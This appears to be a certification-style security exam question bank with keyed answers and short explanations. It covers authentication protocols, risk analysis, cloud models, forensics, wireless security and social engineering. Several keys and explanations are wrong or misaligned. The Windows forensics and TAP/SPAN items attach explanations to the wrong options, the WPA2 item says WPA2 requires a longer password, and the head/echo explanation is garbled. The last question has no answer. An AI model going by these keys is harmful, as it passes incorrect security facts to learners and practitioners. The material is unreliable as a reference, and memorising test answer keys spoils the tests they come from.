-Data recovery (Data recovery refers to the analysis of a disk (or a disk image) for file fragments retained in slack space. These fragments may represent deleted or overwritten files.)
What is it known as when a particular jurisdiction prevents or restricts processing and storage from taking place on systems that do not physically reside within that jurisdiction? -Data sovereignty -E-discovery -Provenance -Preservation
-Data sovereignty (Data sovereignty refers to a jurisdiction that prohibits or limits the processing, storage, and retrieval of data that do not geographically fall under that jurisdiction.)
The IT team has purchased a few devices that are compatible with the Trusted Computing Group Security Subsystem Class called Opal. Which of these device specifications will take advantage of Opal's security features? -Automatic vendor updates -Operating system -Disk encryption -Registry settings
-Disk encryption (The Opal security subsystem class is a set of specifications that defines a management interface for a host application to activate, provision, and manage encryption of user data on self-encrypting drives (SED).)
What is the main difference between a disk image and a snapshot? -Snapshots are complete copies. -Snapshots are Windows exclusive. -Disk images include bootloader and OS. -Disk images can only be captured with Linux.
-Disk images include bootloader and OS. (A disk image is a digital file accurately representing the contents and configuration of a disk volume or a whole data storage unit. A disk image includes a bootloader and operating system (OS).)
The 802.1x framework establishes several ways for devices and users to be securely authenticated before they are permitted access to LAN (Local Area Network) or WLAN (Wireless LAN). Identify the actual authentication mechanism established. -WPA -AES -RSA -EAP
-EAP (802.1x, which is the Port-based Network Access Control framework, establishes several ways for devices and users to be securely authenticated before they are permitted full network access. EAP or extensible authentication protocol is the actual authentication mechanism.)
A website uses a code generator for access to the site. Once a user enters their username, a one-time 30-second code is generated and provided through a stand-alone app. The user must enter the unique code to gain access. This is an example of which of the following cryptography methods? -Entropy -ECC -Block chain -Ephemeral
-Ephemeral (An ephemeral key is an asymmetric cryptographic key that is generated for each individual execution of a key establishment process. The shared secret the client token and authentication server share is combined with a counter to create a one-time password when the user wants to authenticate.)
A foreign country is planning to target another country to destabilize its economy and upcoming elections. A hacktivist group and government leaders are working together using hybrid warfare tactics to accomplish their goal. What are the most effective methods the foreign country can use to carry out their plan? (Select all that apply.) -Fake tweets -Espionage -Dumpster diving -Soft power
-Fake tweets (Using fake news or hoaxes on social media can mislead citizens of the target country very quickly. This can promote hysteria and even dangerous protesting campaigns on the ground.) -Espionage (Hybrid warfare involves espionage and other hacking and social engineering techniques to launch a hostile campaign against another country. Espionage is the practice of spying on another country.) -Soft power (Soft power refers to using diplomatic and cultural assets to achieve an objective. This can influence the operations of companies and or organizations in the target country to assist with hybrid warfare.)
A hacker modified a company photo by embedding malicious code in the picture. The hacker emailed the picture to company employees, and several employees opened the email. The hacker now has remote access to those employees' computers. Which of the following can prevent this method of attack? -File integrity monitoring -Protocol analyzer -File encryption -Steganography
-File integrity monitoring (File integrity monitoring is a feature available in most antivirus software or HIPS (Host-based Intrusion Prevention System). HIPS can capture a baseline of the image, any radical change (like an image), using hashing algorithms, will flag the incident, and quarantine the files.)
A basic installation of a web server will require which of the following to allow unauthenticated access? -Guest account -Shared account -Service account -User account
-Guest account (A guest account is a special type of shared account with no password. It allows anonymous and unauthenticated access to a resource. Guest accounts are created when installing web services, as most web servers allow unauthenticated access.)
Which value is the result of a quantitative or qualitative risk analysis? -Inherent risk -Single loss expentency -Annualized loss expentancy -Risk factors
-Inherent risk (The result of quantitative or qualitative analysis is a measure of inherent risk. Inherent risk is the level of risk before any type of mitigation has been attempted.)
Describe an intrusion prevention system (IPS) that also makes it a single point of failure for network traffic if there is no fault tolerance mechanism in place. -Heuristic appliance -Passive appliance -Anomaly appliance -Inline appliance
-Inline appliance (Intrusion prevention system (IPS) appliances that must have all traffic pass through them are "inline" with the network. This also makes them a single point of failure if there is a no fault tolerance mechanism in place.)
Which of the following, if implemented, will NOT help mitigate the threat of tailgating? -Installing non-discretionary privilege management -Installing a mantrap -Installing surveillance cameras -Installing a turnstile
-Installing non-discretionary privilege management (Nondiscretionary privilege management models are aimed to mitigate the problem of regulating the access control of privileged admin accounts.)
Which of the following baseband radio technologies support higher bandwidth capacities? -FPGA -LTE-M -Narrowband -Zigbee
-LTE-M (LTE Machine Type Communication (LTE-M) allows Internet of Things (IoT) devices to connect directly to a 4G network, without a gateway. It is a baseband radio technology that supports higher bandwidths.)
When implementing a native-cloud firewall, which layer of the Open Systems Interconnection (OSI) model will require the most processing capacity to filter traffic based on content? -Layer 1 -Layer 7 -Layer 4 -Layer 3
-Layer 7 (At layer 7, or the application layer of the OSI model, the firewall can parse application protocol headers and payloads (such as HTTP packets) and make filtering decisions based on their contents. This requires the most processing capacity (or load balancing), or the firewall will become a bottleneck causing network latency.)
The ARP cache stores what kind of information about recent connections? -Packet data -Round trip time (RTT) of network hops -Latency and packet loss stats -MAC addresses
-MAC addresses (The ARP cache displays the MAC address of the interface corresponding with each IP address recently communicated with by the local host. This can be useful for identifying Man-in-the-Middle or other spoofing attacks.)
Which type of network attack involves asserting the use of an arbitrary hardware address onto a network interface card (NIC)? -URL redirection -MAC cloning -ARP poisoning -MAC flooding
-MAC cloning (Media access control (MAC) cloning, or MAC address spoofing, changes the hardware address configured on an adapter interface or asserts the use of an arbitrary MAC address.)
An engineer configures a security control that oversees and monitors other controls for effectiveness. Which category of control does the engineer utilize? -Managerial -Operational -Technical -Availability
-Managerial (A managerial control gives oversight of an information system. Examples could include risk identification or a tool allowing the evaluation and selection of other security controls.)
A multinational company has partnered with several smaller, younger companies. To protect their supply chain and improve their own risk posture, the company offers to provide network security services for their new partners. Conclude what type of risk the company is addressing. -External -Multiparty -Legacy systems -Internal
-Multiparty (Multiparty risk occurs when an adverse event impacts multiple organizations. If a breach occurs for one party, all parties share the risk.)
A network administrator is installing a device that uses redundant array of inexpensive disks (RAID) technologies for redundancy and provides employees remote access so that files can be accessed anywhere. The device does not require licensing and stores data at the file level. Which device is the employee likely installing in the infrastructure? -RDP -NAS -VDI -SAN
-NAS (Network-attached storage (NAS) is a file-level data storage server attached to a network that provides data access to a common group of clients. NAS is a single storage device that serves files over Ethernet. NAS can be accessed remotely and uses RAID technologies for hard drive failure.)
The company's current network utilizes EAP-TTLS (EAP-Tunneled TLS) for supplicant clients connecting to the network. Newer model devices and systems are deployed on the network and are not compatible with EAP-TTLS. These systems require MS-CHAPv2 for authentication. Which of the following options will support these new systems? -EAP-MD5 -PEAP -LEAP -EAP-FAST
-PEAP (PEAP uses MSCHAPv2 in PEAPv0 (also known as EAP-MSCHAPv2). Where required, another iteration called PEAPv2 (also known as EAP-GTC), which is a Cisco implementation, can be used.)
An application user receives an automated message after an attempt to login to a company application to verify activity. Which form of two-factor authentication is this? -SMS -Push notification -Phone call -Voice recognition
-Phone call (A phone call is a form of two-factor authentication (2FA). An automated service dials the registered number on file to confirm authentication of a user.)
Describe the general function of the command echo "head" when used in conjunction with a resource pointer, such as a filename or IP address. -Generates a log file -Identifies vulnerabilities -Prints a web resource header -Prints the first lines of the target
-Prints the first lines of the target (The head command, by default, outputs the oldest ten lines in a file. The echo command is a command that outputs the strings passed as an argument; in this case, the first lines of the provided target.)
Identify the most volatile form of memory. -Hard disk -Random Access Memory (RAM) -Pagefile -Cache
-Random Access Memory (RAM) (System memory is volatile data contained in Random Access Memory (RAM) modules. Since RAM requires power in order to retain data, the contents of RAM disappear when power is turned off.)
Which team performs the offensive role in a penetration exercise? -Purple team -Red team -Blue team -White team
-Red team (The red team performs the offensive role to try to infiltrate the target. This team is one of two competing teams in a penetration testing exercise.)
A capability delivery manager adds a configuration management plan, a failover plan, and a risk assessment to a program's documentation inventory. Which of the following best describes what controls the manager is addressing? -Response and recovery -Technical -Operational -Change management
-Response and recovery (Response and recovery controls are a variety of policies, procedures, and resources defined to guide an entity in responding to an outage/disaster and the steps taken to recover from an outage/disaster.)
A configuration manager creates policies and procedures for events such as power failure, network intrusion, and denial of service. These documents include step-by-step instructions to protect the application and restore it to a functional state within a certain timeframe. What has the configuration manager implemented? -Response and recovery control -Control diversity -Technical control -Operational security control
-Response and recovery control (Response and recovery controls include all policies, procedures, and resources developed for incident and disaster response and recovery. These can include a configuration management plan, disaster recovery plan, and an incident response plan.)
Sometimes data is archived after it is past its usefulness for purposes of security or regulatory compliance. What is this called? -Correlation -Sensitivity -Retention -Trends
-Retention (When policy dictates preserving data in an archive after the date it is still being used, whether for regulatory or security purposes, this is known as a retention policy.)
After reading an article online, a business stakeholder is concerned about a risk associated with Denial of Service (DoS) attacks. The stakeholder requests information about what countermeasures would be taken during an attack. Where would the security analyst look to find this information? -Risk and Control Assessment -Risk heat map -Risk register -Risk regulations
-Risk register (The risk register shows the results of risk assessments in a comprehensible document format. Information in the register includes impact, likelihood ratings, date of identification, description, countermeasures, owner/route for escalation, and status.)
An employee can conduct meetings using a corporate owned personally enabled mobile (COPE) device while on a company related work trip. The service for the device is provided by Verizon Wireless. What component of the device authenticates the device to the provider? -Implied trust -SIM -Context aware -Token key
-SIM (A subscriber identity module (SIM) card is used to identify and authenticate subscribers on mobile and cellular devices. The SIM is issued by a cellular provider with roaming to allow use of other suppliers' tower relays.)
How does the General Data Protection Regulations (GDPR) classify data that can prejudice decisions, such as sexual orientation? -Private -Proprietary -Confidential -Sensitive
-Sensitive (The sensitive classification is used in the context of personal data about a subject that could harm them if made public and could prejudice decisions made about them if referred to by internal procedures.)
How can an attacker exploit the lack of authentication between the internal services (e.g., implicit trust) of a web host to steal service account credentials? -Memory leak -Session replay -Cross-site scripting -Server-side request forgery
-Server-side request forgery (Server-side request forgery (SSRF) exploits both the lack of authentication between the internal servers and services (implicit trust) and weak input validation, allowing the attacker to submit unsanitized requests or Application Programming Interface (API) parameters.)
A cloud service provider (CSP) offers an organization the ability to build and run applications and services without having to manage infrastructure such as provisioning, authentication, and server maintenance. This offering reduces overhead and allows the organization to focus on the product being built. What type of design pattern is this? -Software defined network -Microservice architecture -Serverless architecture -Service oriented architecture
-Serverless architecture (A serverless architecture is a cloud model where applications are hosted by a third-party provider. A serverless architecture removes the responsibility of the consumer to provision, scale, and maintain server and storage solutions by applying functions and microservices.)
A water company has replaced outdated equipment with units that can record and report water consumption from a consumer's home to the office. This eliminates the need to send a technician out monthly to read the equipment. What has the company invested in? -Embedded system -VoIP -RTOS -Smart meter
-Smart meter (A smart meter is an electronic device that records information and communicates the information to the consumer remotely. Smart meters can electronically transmit data on utility use on a predetermined time basis, rather than a company sending out an employee and relying on an estimate.)
A security engineer for a tech firm tests authentication mechanisms for multi-factor authentication. Which personality trait-based solution does the engineer test? Something you know Something you exhibit Something you can do Something you are
-Something you exhibit (Something you exhibit refers to behavioral-based authentication and authorization, with specific emphasis on personality traits.)
A user receives multiple emails daily from various vendors and companies. The emails seem legitimate but are overly excessive. What is the user most likely receiving? -Spam advertisements -SPIM threats -SMiShing texts -Vishing messages
-Spam advertisements (Spam or unsolicited messages via email are sent in bulk to users for advertisements or to deliver malware.)
Having some information already about the target user, an attacker would most likely carry out which of the following to scam the user? -Shoulder surfing -Spear phishing -Tailgating -Dumpster diving
-Spear phishing (Spear phishing is a scam where the attacker has some information that makes an individual target more likely to be fooled by the attack.)
Which aspect of certificate and key management should an administrator consider when trying to mitigate or prevent the loss of private keys? -Storage -Revocation -Expiration -OCSP
-Storage (Private keys or certificates must be securely stored to prevent unauthorized use and loss. The certificate authority that creates the key pair must provide strict access control to the database and maybe even data-at-rest encryption.)
Analyze the active defense solution statements and determine which best describes the purpose of a honeyfile. -The attempts to reuse can be traced if the threat actor successfully exfiltrates it. -A decoy is set as a distraction to emulate a false topology and security zones. -Configurations are in place to route suspect traffic to a different network. -It is helpful in analyzing attack strategies and may provide early warnings of attacks.
-The attempts to reuse can be traced if the threat actor successfully exfiltrates it. (A honeyfile is convincingly useful but actually fake data. This data can be made trackable, so that when a threat actor successfully exfiltrates it, the attempts to reuse or exploit it can be traced.)
Users are only allowed to work in the office. Account policies must provide login security measures. So, users are only working during normal business hours. Identify the policy that establishes the maximum amount of time an account may be logged in for at the workplace? -Time of day policy -Impossible travel policy -Location-based policy -Time-based login policy
-Time-based login policy (A time-based login policy establishes the maximum amount of time an account may be logged in for. For example, a user with no activity will be logged off after 6 hours.)
A network administrator needs a service to easily manage Virtual Private Cloud (VPC) and edge connections. The service must have a central console for ease of monitoring all components. Which of the following is the best solution for the administrator to use in a cloud computing environment? -Cloud storage gateway -Transit gateway -gateway endpoint -NAT gateway
-Transit gateway (A transit gateway is a cloud network hub that allows users to interconnect virtual private clouds (VPC) and on-premises networks through a central console.)
Flow analysis tools, such as IPFIX or Netflow, collect metadata about network traffic without capturing each frame. Evaluate the type of analysis that uses these tools. -Log analysis -Trend analysis -Vulnerability analysis -Packet analysis
-Trend analysis (Since flow analyzers gather metadata and statistics about network traffic, they are commonly used to visualize traffic statistics in order to assist in identifying trends.)
A threat actor logs in to a website as a free user and submits a request for a file. The request references the parent directory of the web server. This injection attack is successful by using a canonicalization attack to disguise the nature of the malicious input. How was the threat actor able to retrieve the file? -Using an LDAP injection attack. -Use a DLL injection attack -Using a directory traversal attack. -Use an XML injection attack.
-Using a directory traversal attack. (A directory traversal attack is an injection attack that uses specific code to request information from a web server's root directory by submitting the directory path.)
The intelligence community requires tight security of classified data stored on the local servers. The area must be inaccessible to unauthorized personnel and able to withstand a blast from explosives. Which of the following is the best solution for securing the assets? -PDS -Vault -DMZ -Air gap
-Vault (A vault is an isolated area that houses critical resources. Vaults use extreme measures to protect access and can typically withstand a major destructive event. A safe is also secure, and considered a smaller alternative to a vault.)
Where should a systems administrator search for more information on how to fix a CPU vulnerability on a Dell rack server? -Facebook -Best Buy Geek Squad -Black Hat conference -Vendor support page
-Vendor support page (Vendors will provide guides, templates, and tools for configuring and securing operating systems, applications, and physical devices like a rack server. CPU vulnerabilities may require firmware updates that may only be available from the vendor.)
A representative at a company reports that they receive unsolicited phone calls seeking banking information for a credit report. Which social engineering variant is the finance director experiencing? -Spear phishing -Whaling -Vishing -Smishing
-Vishing (Vishing is a phishing attack conducted through a voice channel (telephone or VoIP, for instance). Targets could be called by someone purporting to represent their bank or some other official institution.)
Which of the following represents a non-intrusive scanning type of framework? -An exploitation framework -Metasploit -Penetration testing -Vulnerability scanning
-Vulnerability scanning (Whether they use purely passive techniques or some sort of active session or agent, vulnerability scanners represent a non-intrusive scanning type. The scanner identifies vulnerabilities from its database by analyzing things, such as build and patch levels or system policies.)
A brute-force attack compromises a server in a company's data center. Security experts investigate the attack type and discover which vulnerability on the server? -Default settings -Unsecure protocols -Open ports and services -Weak encryption
-Weak encryption (Weak encryption vulnerabilities allow unauthorized access to data. An algorithm used for encryption may have known weaknesses that allow brute-force enumeration.)
A cloud service provider (CSP) offers email capability, remote desktop access, and virtual class software to its consumers. Which cloud service model does this best represent? -IaaS -XaaS -PaaS -Hybrid
-XaaS (Anything as a Service (XaaS) is a cloud model that offers a multitude of services over the internet. These can include, but are not limited to, remote desktop protocol (RDP), email services, and pre-configured software. XaaS is a mix and match of cloud services.)
An IT hobbyist builds a script in Python to scrape web-pages for images. Recommend a command-line tool the hobbyist can use in his script to download the image files to his local drive. -cat -grep -curl -chmod
-curl (Curl is a command-line tool to transfer data to or from a server using supported protocols, such as HTTP, FTP, or IMAP. It is commonly used in web scrapers or for downloading files from the web to local storage.)
A security administrator notices port scanning from an unknown entity on the company infrastructure. The administrator sets up a router to provide erroneous information to be provided in return to protect the system from breach or attack. What is the router providing in response to the scan? -Fake telemetry -DNS sinkhole -HIDS -Honeyfile
Fake Telemetry
Analyze and select the items demonstrating advantages Terminal Access Controller Access-Control System Plus (TACACS+) has over Remote Authentication Dial-In User Service (RADIUS). (Select all that apply.) [] It allows detailed management of privileges assigned to users. [] It only encrypts authentication data. [] It provides greater flexibility and reliability. [] It is easier to detect when a server is down.
[] It provides greater flexibility and reliability. (TACACS+ is similar to RADIUS but Cisco designed it with flexibility in mind. Its connection-oriented delivery method increases reliability and flexibility. It is supported by third parties and open-source RADIUS implementations.) [] It is easier to detect when a server is down. (TACACS+ uses TCP communications for reliable, connection-oriented delivery, making it easier to detect when a server is down.)
A network with two normal-working switches has several client computers connected for work and Internet access. After adding two new switches and more client computers, the new computers, as well as some of the old client computers, cannot access the network. What are most likely the cause and the solution? (Select all that apply.) []Flood guard []Port security []A loop in the network []STP
[]A loop in the network (A switch loop on the network will cause network connections to drop since the packet cannot make the appropriate hop to the next switch to its final destination. Switching loops also generates broadcast storms.) []STP (STP (Spanning Tree Protocol) is a means for the bridges to organize themselves into a hierarchy and prevent loops from forming.)
A company allows the use of corporate apps on employee-owned mobile devices. Mobile application management (MAM) services make this possible. Examining the list of available enterprise mobility management (EMM) features in today's market, which of the following would NOT be available for use in this case? (Select all that apply.) []Use of containers []Ability to remote wipe []Deployment of workspaces []Manage camera use
[]Ability to remote wipe (The ability to remote wipe a mobile device is made possible using policies created by mobile device management (MDM) services. A company cannot forcefully control an employee-owned device in this manner.) []Manage camera use
A company is renovating a new office space and is updating all Cisco routers. The up-to-date Internetwork Operating System (iOS) will provide the best protection from zero-day exploits. What other options could a network administrator configure for route security? (Select all that apply.) []SNMP trap collections []IPv6 on clients []Block source routed packets []Message authentication
[]Block source routed packets (Blocking source routed packets will prevent the chance of spoofed IP addresses from bypassing routers and firewall filters.) []Message authentication (Most dynamic routing protocols support message authentication via a shared secret configured on each device. This allows routers to accept routing updates that are managed by the network team.)
Conclude which terms represent a core feature of the Diamond Model of Intrusion Analysis. (Select all that apply.) []Capability []Infrastructure []Victim []Eradication
[]Capability (The capability feature describes the tools and/or techniques of the adversary used in the event. All of the vulnerabilities and exposures utilized by the individual's capability, regardless of the victim, is its capacity.) []Infrastructure (The infrastructure feature describes the communication structures the adversary uses to utilize a capability.) []Victim (A victim is the target of the adversary and against whom vulnerabilities and exposures are exploited and capabilities used. It is useful to define the victim in terms of both the people or organization targeted, as well as the victim's assets (i.e., the attack surface).)
Determine appropriate methods the team can use to acquire OS-level information from Windows. (Select all that apply.) []Check system and security logs. []Initiate sleep mode and analyze the hibernation file. []Use memdump to capture data from volatile memory. []Reboot and analyze memory dump files.
[]Check system and security logs. (When Windows encounters an unrecoverable kernel error, Windows writes contents of memory to a dump file or a mini dump file. Investigators can then analyze the contents for a variety of information.) []Initiate sleep mode and analyze the hibernation file. (Windows creates a hibernation file at the root of the boot volume when in sleep mode. The data can be recovered and decompressed, then loaded into a software tool for analysis.) []Reboot and analyze memory dump files. (Windows system and security logs can provide insight on certain events, providing a timeline with who may have logged on or tried to log on to the system.)
Select viable methods of investigation in the case of authentication attacks. (Select all that apply.) []Compare authentication logs with security and network logs. []Search application logs for use of unauthorized applications. []Monitor network bandwidth for irregularities. []Use a SIEM dashboard to identify suspicious trends in user traffic.
[]Compare authentication logs with security and network logs. (Even though investigating every security and network log manually would take forever, by comparing irregularities in authentication logs (such as incomplete authentication), investigators can correlate corresponding entries.) []Search application logs for use of unauthorized applications. (If an intruder is utilizing an application within the network, such as Remote Desktop, the application logs may provide the evidence.) []Use a SIEM dashboard to identify suspicious trends in user traffic. (Security Information and Event Management (SIEM) software can often visualize log information to identify trends.)
A large company is moving to a new facility and selling its current office fully-furnished with the company's older PC workstations. Not only must the move be as quick as possible, but the company will also provide employees with new equipment. The IT department has backed up all the important data, and the company purchasing the office and equipment is a market competitor. Therefore, the company has instructed the IT department to perform full data sanitation and implement the recycling policy. Recommend types of data sanitation procedures the IT department should use before leaving the facility for good. (Select all that apply.) []Crypto erase hard drives []Perform a factory installation of Windows on all workstations []Pulverize USB drives []Degauss magnetic tape drives
[]Crypto erase hard drives (For drives that support it, such as self-encrypting drives (SEDs), crypto-erase is among the most secure methods of drive deletion. Crypto-erase, sometimes called Secure Erase, encrypts all data on the drive using a media encryption key. Then, the key is deleted, rendering the data unrecoverable.) []Pulverize USB drives (USB hard drives can be pulverized, leaving a poor chance of data recovery. Hard disks can be pulverized as well, but this should be done with industrial-grade machinery.) []Degauss magnetic tape drives (Degaussing is erasing data using a strong magnet on the hard disk or magnetic tapes. Degaussing removes the possibility of recovering any information.)
A visiting consultant to a company fails at trying to copy a file from a shared drive to a USB flash drive. Which security solutions block the file from being copied? (Select all that apply.) []Data loss prevention system (DLP) []Host intrusion detection system (HIDS) []Host intrusion prevention system (HIPS) []Endpoint protection platform (EPP)
[]Data loss prevention system (DLP) (Data loss prevention (DLP) is a security solution that is configured with policies to identify privileged files to prevent data from being copied or attached to a message without authorization.) []Endpoint protection platform (EPP) (An endpoint protection platform (EPP) usually depends on an agent running on a local host. Agents may be installed for services such as antivirus, intrusion detection, and data loss prevention.)
Which attack vector would an insider threat use to effectively install malicious tools on specific sets of servers for backdoor access? (Select all that apply.) []Wireless network []Direct access []Social media []Removable media
[]Direct access (Direct access is a type of physical or local attack. The threat actor could exploit an unlocked workstation, use a boot disk to try to install malicious tools, or steal a device.) []Removable media (Removable media like a USB drive or SD card can conceal malware. With direct access, a malicious USB can be inserted, and in some cases, automatically run malware to easily compromise the device.)
Teams of security experts are preparing for a penetration exercise using a white box environment. The activities will be monitored in an isolated environment in the company's local datacenter. What would be the appropriate rules of engagement for this exercise? (Select all that apply.) []Do not access production network. []Perform reconnaissance activities first. []Steal files from file server A. []Involve a cloud service provider.
[]Do not access production network. (An explicit rule to not access or perform penetration on the production network is a concrete objective. This reminds testers of the scope of the exercise which is limited to the isolated environment.) []Steal files from file server A. (Rules of engagement involve specifying the activities or goals of the exercise. A concrete objective such as "steal files from file server A" is very specific, rather than using vague descriptions like "break the network.")
A company deployed a wireless access point and wishes to enable the Enterprise mode for secure wireless connections. The servers have certificates, but the supplicants do not. Which of the following options would fit the company's needs? (Select all that apply.) []RADIUS Federation []EAP-FAST []PEAP []EAP-MD5
[]EAP-FAST (EAP-FAST (Flexible Authentication via Secure Tunneling) is Cisco's replacement for LEAP. It addresses LEAP vulnerabilities using TLS (Transport Layer Security) with PAC (Protected Access Credential) instead of certificates.) []PEAP (PEAP (Protected Extensible Authentication Protocol) uses a server-side public key certificate to create an encrypted tunnel between the supplicant and authentication server. PEAP is an industry standard.)
A severe tropical storm devastates an island where a small company stores data. Which disaster types have impacted the company? (Select all that apply.) []Internal []External []Person-made []Environmental
[]Environmental (An environmental or natural disaster is one that could not be prevented through human agency. Environmental disasters include floods, earthquakes, storms, or disease.) []External (External disaster events are caused by threat actors who have no privileged access and includes disasters that have an impact on the organization through wider environmental or social impacts.)
A software developer created a new application, and the software company pressured the developer to release it to the public. Which of the following helps ensure the application is secure before the release? (Select all that apply.) []Application auditing []Error handling []Input validation []Proper authentication and authorization
[]Error handling (Some of the challenges of application development include the pressure to release a solution ahead of schedule, as well as neglecting secure development practices, such as error handling.) []Input validation (Input validation is another secure development practice that a software developer should not neglect.) []Proper authentication and authorization (Proper authentication and authorization is an important part of performing secure coding practices.)
An organization moves its data to the cloud. Engineers use regional replication to protect data. Review the descriptions and conclude which apply to this configuration. (Select all that apply.) []Known as zone-redundant storage []Safeguards data in the event of an outage covering a large area []Available access if a single data center is destroyed []Where the storage account was created
[]Known as zone-redundant storage (Regional replication (also called zone-redundant storage) replicates data across multiple data centers within one or two regions.) []Available access if a single data center is destroyed (Regional replication safeguards data and access in the event a single data center is destroyed or goes offline.)
Which of the following are common constraints of embedded systems? (Select all that apply.) []Network range []Compute power []Reliability []Cryptography capability
[]Network range (The lack of size and computing power also diminishes choices for network connectivity. Transmission Control Protocol/Internet Protocol (TCP/IP)-based networking is not up to standards with embedded systems using relatively low processing power.) []Compute power (Compute power is a common constraint of an embedded system. Embedded systems are relatively small and do not have the average computing capabilities as a standard computer.) []Cryptography capability (Authentication is a common constraint for embedded systems. Because they lack compute capacity, embedded systems cannot match the authentication technologies of a standard network.)
After a year of vulnerability scans, a security engineer realized that there were zero false positive cases. The application logs showed no issues with the scanning tool and reports. What type of scanning tool or configuration would result in zero false positives being reported? (Select all that apply.) []Credentialed scan []Non-credentialed scan []Intrusive tool []Non-intrusive tool
[]Non-credentialed scan (A non-credentialed scan is one that proceeds by directing test packets at a host without being able to log on to the operating system (OS) or application. Fewer vulnerabilities are detected, resulting in fewer false positives.) []Non-intrusive tool (A non-intrusive or passive scanning tool analyzes indirect evidence, such as the types of traffic generated by a device. Fewer vulnerabilities are detected, resulting in fewer false positives.)
Password lockout commonly prohibits users from logging in after a number of failed password attempts. While this practice may protect against unauthorized users gaining access to valid user login information, what disadvantages could implementing this practice create for an organization? (Select all that apply.) []Password lockout is not as secure as a password reset system. []Password lockout increases the workload for security management. []Password lockout is vulnerable to Denial of Service (DoS) attacks. []Password lockout is more vulnerable to social engineering than other techniques.
[]Password lockout increases the workload for security management. (Password lockout also increases the workload for security managers, as this system typically requires an administrator to unlock locked accounts, and if this happens frequently, it can be quite time-consuming.) []Password lockout is vulnerable to Denial of Service (DoS) attacks. (Password lockout rules are vulnerable to DoS attacks. An attacker can simply overwhelm the password login system with login attempts and lock legitimate users out of their accounts, denying them service.)
A risk management implementation begins with which of the following characteristics? (Select all that apply.) []Mitigation []Priortization []Classification []Identification
[]Priortization (Prioritizing assets allows a company to decide which assets are most important to protect.) []Classification (Classifying assets and data according to criticality provides a company a basis to assess risks in the implementation process.) []Identification (Identifying assets requires indicating which hardware and software a company maintains. Identifying assets early in the risk management process allows for a smoother risk management implementation.)
Specify elements that a playbook should include. (Select all that apply.) []Query strings to identify incident types []Backup passwords and private keys []When to report compliance incidents []Incident categories and definitions
[]Query strings to identify incident types (Specific query strings and signatures easily scan and detect specific types of incidents. These strings improve response and resolution time.) []When to report compliance incidents (How to address compliance incidents with, for example, Health Insurance Portability and Accountability Act (HIPAA) laws should be outlined. It may include a list of contacts and their information, how to contact them, and when.) []Incident categories and definitions (Incident categories and descriptions help ensure that all management and operational staff have a shared framework for interpreting the meaning of terms, concepts, and definitions.)
Evaluate the attack types and determine which are used when a high-level executive is targeted via a suspicious text message. (Select all that apply.) []SMiShing []Whaling []Pharming []Vishing
[]SMiShing (SMiShing refers to using simple message service (SMS) text communications with a mobile device as an attack vector.) []Whaling (Whaling is a spear phishing attack directed specifically against upper levels of management in the organization (CEOs and other "big fish").)
Consider conditional access to a system and determine which options fit the criteria. (Select all that apply.) []Non-discretionary system []Sudo restrictions []Difficult to enforce []User Account Control (UAC)
[]Sudo restrictions (A conditional access system monitors account or device behavior throughout a session. An example is sudo restrictions on privileged accounts.) []User Account Control (UAC) (Conditional access is an example of rule-based access control where policies are determined by system-enforced rules. The User Account Control (UAC) is an example of conditional access.)
What are the main features that differentiate the Test Access Point (TAP) from a Switched Port Analyzer (SPAN)? (Select all that apply.) []Test access point (TAP) is considered 'active' only. []Test access point (TAP) avoids frame loss. []Test access point (TAP) is a temporary solution. []Test access point (TAP) is a separate hardware device.
[]Test access point (TAP) avoids frame loss. (A test access point (TAP) is a hardware device that copies signals from the physical layer and the data link layer, while SPAN (switched port analyzer) is simply mirroring ports.) []Test access point (TAP) is a separate hardware device. (Since no network or transport logic is used with a test access point (TAP), every frame is received, allowing reliable packet monitoring.)
Describe scenarios where containment measures, such as isolation and segmentation techniques, should be taken. (Select all that apply.) []The investigation of a recent incident is ongoing. []A compromised host pings another host periodically. []An unauthorized user accesses a server. []A worm has infected a device on the network.
[]The investigation of a recent incident is ongoing. []An unauthorized user accesses a server. []A worm has infected a device on the network.
A company purchased a few rack servers from a different vendor to try with their internal cluster. After a few months of integration failures, the company opted to remain with their previous vendor and to upgrade their other rack servers. The current commercial software will be migrated to the new rack servers. What may have caused the company to remain with their previous vendor for new rack servers? (Select all that apply.) []Vendor lacks expertise. []Servers are incompatible. []Disks are self-encrypting. []The code is unsecure.
[]Vendor lacks expertise. (A vendor that lacks expertise is also unable to support deployment and other activities required for using a rack server in the environment. Customer experience is vital to future purchases.) []Servers are incompatible. (Devices or software that are incompatible with other devices or software make them difficult to manage. Companies often seek compatibility factors to ensure full integration with existing assets.)
Evaluate and select the differences between WPA and WPA2. (Select all that apply.) []WPA2 supports an encryption algorithm based on the Advanced Encryption Standard (AES) rather than the version of RC4 "patched" with the Temporal Key Integrity Protocol (TKIP). []WPA2 requires entering a longer password than WPA. []WPA2 is much more secure than WEP, where WPA is not. []WPA2 is a security protocol developed by the Wi-Fi Alliance for use in securing wireless networks.
[]WPA2 supports an encryption algorithm based on the Advanced Encryption Standard (AES) rather than the version of RC4 "patched" with the Temporal Key Integrity Protocol (TKIP). []WPA2 requires entering a longer password than WPA.
Identify which tools would be used to identify suspicious network activity. (Select all that apply.) []Metasploit []tcpreplay []Wireshark []tcpdump
[]tcpreplay (tcpreplay is a command-line utility for Linux that can replay data from a .pcap file, for example, to analyze traffic patterns and data.) []Wireshark (Wireshark is a graphical application that can capture all types of traffic by sniffing the network, and save that data to a .pcap file.) []tcpdump (tcpdump is a command-line packet capture utility for Linux. The utility will display captured packets until halted manually, and it can save frames to a .pcap file. This tool commonly uses filter expressions to reduce the number of frames captured, such as Type, Direction, or Protocol.)
Which of the following is a computer that uses remote desktop protocol to run resources stored on a central server instead of a localized hard drive and provides minimal operating system services? -Edge computing -VDI -Fog computing -Thin client
-Thin client (A thin client is a computer that runs from resources stored on a central server instead of a localized hard drive. Thin clients work by connecting remotely to a central server-based computing environment where all resources and data are stored.)
An attacker exploited a vulnerability on a website frequently visited by a group of bank employees. Once the employees visit the site, the attacker's malware infects their computers. What type of attack did the employees fall for? -A hoax attack -A watering hole attack -A lunchtime attack -A pharming attack
-A watering hole attack (A watering hole attack is a directed social engineering attack. It relies on the circumstance that a group of targets may use an unsecure third-party website.)
A user receives access to a company system through the use of a smart card. The user can then access data they have privileges to access. A record of all events the user accomplishes or attempts to is recorded in a log for administrative purposes. What access management policy does this best describe? -DAC -AAA -MAC -Group based
-AAA (Authentication, Authorization, and Accounting (AAA) provides a comprehensive access management approach to identifying, authorizing, and accounting for user activity.)
During a risk assessment, a company indicates the value of employee used laptops to be $1,500.00 a piece. What should the company define to come up with the annual loss expectancy in a quantitative risk assessment. -ARO -RPO -RTO -ALE
